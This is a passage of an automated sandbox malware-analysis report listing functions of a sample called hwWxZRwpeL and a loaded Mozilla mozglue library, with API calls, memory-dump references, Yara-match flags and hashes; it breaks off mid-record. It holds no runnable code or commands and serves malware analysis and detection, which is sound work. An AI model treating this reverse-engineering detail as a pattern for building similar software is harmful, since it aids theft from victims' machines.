                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 40f6e3f9009f6a7635f51a1eec795001d16a245488d5739f9ec82c61844e4736
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 245b042ebf6a569a0015b678e3554142ff2c49e54545d664a08d17abdec13cb2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40f6e3f9009f6a7635f51a1eec795001d16a245488d5739f9ec82c61844e4736
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F517171E011298FCF08CF69C894AAEBBF1FB85304FA98619D865A7790C7306946CF95
                                                                                                                                                                                                                                                                                                                                  Function 6C5DCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5DCEBD
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C5DCEF5
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C5DCF4E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a637aa3f79ef768b1d268be280890f17884ea3afa6abd6ed4665a7cd8a93e415
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0263fa1c984a97ad87106895fc48083ad8730367ffd23f53a662d26fb962ff41
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a637aa3f79ef768b1d268be280890f17884ea3afa6abd6ed4665a7cd8a93e415
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B451F075A002168FCB05CF1CC890AAAFBA5EF99314F2A859DD8595F352D731BD06CBE0
                                                                                                                                                                                                                                                                                                                                  Function 6C616470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6182BC,?,?), ref: 6C61649B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6164A9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60FA80: GetCurrentThreadId.KERNEL32 ref: 6C60FA8D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60FA80: AcquireSRWLockExclusive.KERNEL32(6C65F448), ref: 6C60FA99
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61653F
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C61655A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6fc04eeac29a803119d53376bcef8f460fdad4fdfe7e6d9ab106f0dd47cd250d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 34fe19702800a5037d986a3df5fac8effbf544722d443d64bde5b0355948d2be
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fc04eeac29a803119d53376bcef8f460fdad4fdfe7e6d9ab106f0dd47cd250d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 663181B5A083059FD704CF15D88069BBBE4FF89314F50842EE89A97740D734E919CB96
                                                                                                                                                                                                                                                                                                                                  Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041967B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00419766
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 396451647-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 089df30a90cb3c016d759ae6a3619fd99d8562db7c843839008f515e7728cabc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 089df30a90cb3c016d759ae6a3619fd99d8562db7c843839008f515e7728cabc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                                                                                                                                                                                                                                                                                                                  Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004189E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %dx%d
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2716131235-2206825331
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 48c329220a8313ca1d79ca46da8108ae93342227b731e9330e58e48d9d658c07
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48c329220a8313ca1d79ca46da8108ae93342227b731e9330e58e48d9d658c07
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                                                                                                                                                                                                                                                                                                                  Function 6C5EB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5EB4F5
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C5EB502
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C5EB542
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C5EB578
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8277b4e43fe5573f84d65d95446105236f8bf11eb6ab75653450edb1a5e9abf6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fbd0085afc91690fa882e5d7d57b9b669ea2aed48a7405ff4e18f1a887bea03
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8277b4e43fe5573f84d65d95446105236f8bf11eb6ab75653450edb1a5e9abf6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D711D230A04B41C7D712DF2AD940766B3B1FFDA319FA4970AD84953A02FBB0A5C5CB99
                                                                                                                                                                                                                                                                                                                                  Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00417B83
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1243822799-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                                                                                                                                                                                                                                                                                                                  Function 6C613DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C5DF20E,?), ref: 6C613DF5
                                                                                                                                                                                                                                                                                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C5DF20E,00000000,?), ref: 6C613DFC
                                                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C613E06
                                                                                                                                                                                                                                                                                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C613E0E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CC00: GetCurrentProcess.KERNEL32(?,?,6C5D31A7), ref: 6C60CC0D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C5D31A7), ref: 6C60CC16
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b1d30f146d151a0d574c16c2a4f3babd6e0e82d0e848a4e23e587413f25232d6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d4614f3921245b2ea771380a487839e8b322fb3ac75b2d1d133d677f14d83afc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1d30f146d151a0d574c16c2a4f3babd6e0e82d0e848a4e23e587413f25232d6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF082B16002087FD700AB55DC81DAB372DDB47624F544020FD0917700D636BE1986FF
                                                                                                                                                                                                                                                                                                                                  Function 6C6285B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6285D3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C628725
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2d2d96748e38f6bfc3301927c34d4c3f681bf03392a0ac07c3edd6eeeb23bbde
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 385dfbe35afb8ca457665a853c17a9867f5ae68ab3bea352f90a1ea3c474da33
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d2d96748e38f6bfc3301927c34d4c3f681bf03392a0ac07c3edd6eeeb23bbde
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC516775A00652CFD701CF18C884A99BBF1BF4A318F18C18AD8595BB62C339EC85CF96
                                                                                                                                                                                                                                                                                                                                  Function 6C5DBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C5DBDEB
                                                                                                                                                                                                                                                                                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5DBE8F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d9355782bb4f541450df70746ee4678a3d29c011590d9bbfc0c4a68f33055a0
